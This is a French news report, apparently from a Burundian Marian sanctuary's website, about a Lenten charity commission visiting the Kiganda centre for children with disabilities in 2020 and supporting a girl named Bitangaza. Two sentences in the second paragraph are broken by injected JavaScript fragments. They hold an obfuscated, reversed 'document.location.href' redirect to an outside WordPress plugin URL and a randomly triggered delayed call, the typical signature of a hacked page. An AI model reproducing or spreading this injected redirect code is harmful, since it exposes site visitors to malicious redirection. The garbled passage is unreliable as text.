Le centre des handicapés de Kiganda est fonctionnel depuis 1969 pour accueillir des enfants avec handicap venus de différentes familles pour y recevoir une éducation et une formation qui correspondrait aux souhaits ou aux capacités de chacun des intéressés. La Commission Action Carême en apostolat au Sanctuaire Marial de la Paix et Réconciliation de Mont Sion Gikungu rend visite et apporte son assistance aux prisons et à de tels centres depuis plus de dix ans pour réconforter ces âmes en difficultés.
En l’an 2010, la Commission Action Carême a récupéré une jeune fille qu’elle a dû renommer BITANGAZA pour son toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}double handicap physique, mais avec un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don spécial de pourvoir à un certain nombre de ses besoins d’elle-même: elle n’a aucun bras et même ses jambes ne peuvent pas se poser par terre pour marcher. Elle reste toujours dans sa chaise roulante et ne la quitte que pour ses besoins de propreté et le repos. Elle étonne beaucoup de par sa capacité de faire toutes les activités qu’une main normale d’une personne peut faire avec son pied et ses orteils. Elle a commencé ses études fondamentales depuis 2014 et elle est actuellement en classe de septième année dans une des écoles fondamentales de Kiganda. Dès 2010, la commission Action Carême rend visite au centre des handicapés de Kiganda pour réconforter les jeunes que ce centre héberge en général et pour prêter main forte à leur fille Bitangaza de façon particulière.
Ce jeudi de l’Ascension du Seigneur 2020, trois membres de la commission Action Carême accompagnés par le Père Recteur du Sanctuaire Marial de la Reine de la Paix et Réconciliation ont rendu visite à ces âmes dans le besoin d’être assistées. Les enfants étaient bien avisés de la visite et ils attendaient les visiteurs avec impatience. A leur arrivée, les membres de la commission ci-haut citée ont d’abord participé à une célébration eucharistique avant de se diriger vers les enceintes dudit centre des handicapés. Ils ont été chaleureusement accueillis par les enfants visités qui ont directement exprimés leur joie par des danses et chants d’accueil. Sœur Fidela Nahayo a, dans son allocution d’accueil aux visiteurs, exprimer la joie d’accueillir parmi eux des amis du centre qui n’ont jamais cessé de témoigner de leur amour envers le centre et les personnes qu’il abrite. Elle a aussi émis le souhait de voir un jour les enfants qu’ils encadrent visiter un lieu de pèlerinage aussi convoité comme Mont Sion. Un des enfants dudit centre a aussi exprimé la joie de ses frères et sœurs pour la visite des personnes venues de la mairie de Bujumbura.
Madame Dorothée Buhangare, en tête de la délégation a, à son tour remercié toutes les personnes qui habitent le centre, à commencer par les enfants encadrés, leurs éducateurs et deux sœurs qui ont actuellement la première responsabilité dans la vie du centre. Elle a tenu à préciser le contenu de leur enveloppe. Il s’agissait entre autres des limonades de types aquavie, des baignés, des draps pour plus de dix lits, des habits, du sel de cuisine, des fruits de mandarines et l’huile de palme. Ils ont préféré partager sur place les limonades et baignés avec les visiteurs. Père Coyitungiye a précisé avoir pris très bonne note de tout ce qui avait été dit et les souhaits émis par les uns et les autres. Il dit attendre impatiemment la visite de ces enfants avec handicap dans les enceintes du Sanctuaire de le Reine de la paix et la réconciliation un jour. Les visiteurs ont pris leur chemin retour à 16h 15 minutes dans la joie et ambiance festive.
Nyandwi M.